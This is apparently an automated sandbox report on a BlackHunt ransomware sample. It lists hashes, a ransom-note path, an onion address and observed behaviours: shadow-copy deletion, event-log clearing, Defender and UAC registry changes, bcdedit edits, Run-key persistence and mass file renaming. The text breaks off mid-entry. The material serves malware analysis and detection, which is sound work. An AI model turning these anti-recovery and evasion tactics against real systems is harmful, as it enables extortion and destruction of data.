Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231129-en -
resource tags
arch:x64arch:x86image:win7-20231129-enlocale:en-usos:windows7-x64system -
submitted
19-01-2024 00:08
Static task
static1
Behavioral task
behavioral1
Sample
9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe
Resource
win7-20231129-en
Behavioral task
behavioral2
Sample
9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe
Resource
win10v2004-20231215-en
General
-
Target
9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe
-
Size
707KB
-
MD5
392457a6460ff6bedd9f2e983ae298fe
-
SHA1
f9bd5c484ef0a01e826963a3c9f1aeec5d7635cf
-
SHA256
9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94
-
SHA512
b2f96b2c67677df4a7a37e925f24347f80e69cbebdcbe3d4895db4273bddf8b35f29f80260c12b8bd525b332b58eb4ef8e50c7046dbd83cb443c80a67780d424
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1s80vnh:6uaTmkZJ+naie5OTamgEoKxLW/Kh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 2 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 1468 fsutil.exe 3208 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Clears Windows event logs 1 TTPs 5 IoCs
pid Process 3056 wevtutil.exe 2372 wevtutil.exe 2468 wevtutil.exe 3592 wevtutil.exe 3304 wevtutil.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 4 IoCs
pid Process 1784 bcdedit.exe 2808 bcdedit.exe 3624 bcdedit.exe 2608 bcdedit.exe -
Renames multiple (2875) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2820 wbadmin.exe 2592 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Deletes itself 1 IoCs
pid Process 3092 cmd.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Enumerates connected drives 3 TTPs 27 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\A: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\S: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\V: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\X: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\M: fsutil.exe File opened (read-only) \??\O: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\P: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\Z: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\J: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\M: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\U: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\I: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\H: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\R: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\G: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\K: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\W: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\Y: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\E: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\T: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\B: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\F: fsutil.exe File opened (read-only) \??\Q: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\L: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened (read-only) \??\N: 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\#BlackHunt_BG.jpg" 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.w3c.dom.svg_1.1.0.v201011041433.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\zh_TW\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\he\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\SuspendMerge.sql 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\feedbck2.gif 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-core_zh_CN.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\pagecurl.png 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-doclet.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\hy\LC_MESSAGES\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\skins\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\bin\server\classes.jsa 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\win32_LinkNoDrop32x32.gif 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Dot.png 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derby.war 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PDDom.api 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Recife 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\th\LC_MESSAGES\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.SF 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+5 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ne\LC_MESSAGES\vlc.mo 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_output\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\META-INF\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-openide-compat.xml 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jre7\lib\fonts\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\time-span-16.png 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Yakutat 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\et\LC_MESSAGES\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Nauru 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\plugins\video_splitter\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\#BlackHunt_ReadMe.txt 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-masterfs-nio2.xml 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Full\full.png 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files\VideoLAN\VLC\locale\id\#BlackHunt_Private.key 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_ja.jar 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Saipan 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\#BlackHunt_ReadMe.hta 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1380 schtasks.exe -
Interacts with shadow copies 2 TTPs 6 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 2444 vssadmin.exe 2712 vssadmin.exe 2684 vssadmin.exe 1708 vssadmin.exe 2800 vssadmin.exe 3148 vssadmin.exe -
Kills process with taskkill 1 IoCs
pid Process 3948 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3627615824-4061627003-3019543961-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3744 PING.EXE -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 3504 mshta.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeRestorePrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeBackupPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeTakeOwnershipPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeAuditPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeSecurityPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeIncBasePriorityPrivilege 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe Token: SeBackupPrivilege 1580 vssvc.exe Token: SeRestorePrivilege 1580 vssvc.exe Token: SeAuditPrivilege 1580 vssvc.exe Token: SeBackupPrivilege 2096 wbengine.exe Token: SeRestorePrivilege 2096 wbengine.exe Token: SeSecurityPrivilege 2096 wbengine.exe Token: SeSecurityPrivilege 2372 wevtutil.exe Token: SeSecurityPrivilege 2468 wevtutil.exe Token: SeBackupPrivilege 2372 wevtutil.exe Token: SeBackupPrivilege 2468 wevtutil.exe Token: SeSecurityPrivilege 3056 wevtutil.exe Token: SeBackupPrivilege 3056 wevtutil.exe Token: SeSecurityPrivilege 3592 wevtutil.exe Token: SeBackupPrivilege 3592 wevtutil.exe Token: SeSecurityPrivilege 3304 wevtutil.exe Token: SeBackupPrivilege 3304 wevtutil.exe Token: SeDebugPrivilege 3948 taskkill.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2364 wrote to memory of 2400 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 31 PID 2364 wrote to memory of 2400 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 31 PID 2364 wrote to memory of 2400 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 31 PID 2364 wrote to memory of 2400 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 31 PID 2364 wrote to memory of 2540 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 30 PID 2364 wrote to memory of 2540 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 30 PID 2364 wrote to memory of 2540 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 30 PID 2364 wrote to memory of 2540 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 30 PID 2364 wrote to memory of 1468 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 145 PID 2364 wrote to memory of 1468 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 145 PID 2364 wrote to memory of 1468 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 145 PID 2364 wrote to memory of 1468 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 145 PID 2400 wrote to memory of 2804 2400 cmd.exe 51 PID 2400 wrote to memory of 2804 2400 cmd.exe 51 PID 2400 wrote to memory of 2804 2400 cmd.exe 51 PID 2364 wrote to memory of 2772 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 35 PID 2364 wrote to memory of 2772 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 35 PID 2364 wrote to memory of 2772 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 35 PID 2364 wrote to memory of 2772 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 35 PID 2540 wrote to memory of 2604 2540 cmd.exe 36 PID 2540 wrote to memory of 2604 2540 cmd.exe 36 PID 2540 wrote to memory of 2604 2540 cmd.exe 36 PID 2364 wrote to memory of 2564 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 38 PID 2364 wrote to memory of 2564 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 38 PID 2364 wrote to memory of 2564 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 38 PID 2364 wrote to memory of 2564 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 38 PID 2364 wrote to memory of 2664 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 40 PID 2364 wrote to memory of 2664 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 40 PID 2364 wrote to memory of 2664 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 40 PID 2364 wrote to memory of 2664 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 40 PID 2364 wrote to memory of 2828 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 46 PID 2364 wrote to memory of 2828 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 46 PID 2364 wrote to memory of 2828 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 46 PID 2364 wrote to memory of 2828 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 46 PID 2772 wrote to memory of 2592 2772 cmd.exe 45 PID 2772 wrote to memory of 2592 2772 cmd.exe 45 PID 2772 wrote to memory of 2592 2772 cmd.exe 45 PID 2364 wrote to memory of 2080 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 42 PID 2364 wrote to memory of 2080 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 42 PID 2364 wrote to memory of 2080 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 42 PID 2364 wrote to memory of 2080 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 42 PID 2364 wrote to memory of 2816 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 44 PID 2364 wrote to memory of 2816 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 44 PID 2364 wrote to memory of 2816 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 44 PID 2364 wrote to memory of 2816 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 44 PID 2364 wrote to memory of 2496 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 50 PID 2364 wrote to memory of 2496 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 50 PID 2364 wrote to memory of 2496 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 50 PID 2364 wrote to memory of 2496 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 50 PID 1468 wrote to memory of 2488 1468 fsutil.exe 47 PID 1468 wrote to memory of 2488 1468 fsutil.exe 47 PID 1468 wrote to memory of 2488 1468 fsutil.exe 47 PID 2364 wrote to memory of 2756 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 49 PID 2364 wrote to memory of 2756 2364 9024d88d6d13ae39fabf8f26af11d206177bd7a6b27bdaa25173b9ef71148c94.exe 49 PID 2364 wrote to memory of 2756 2364 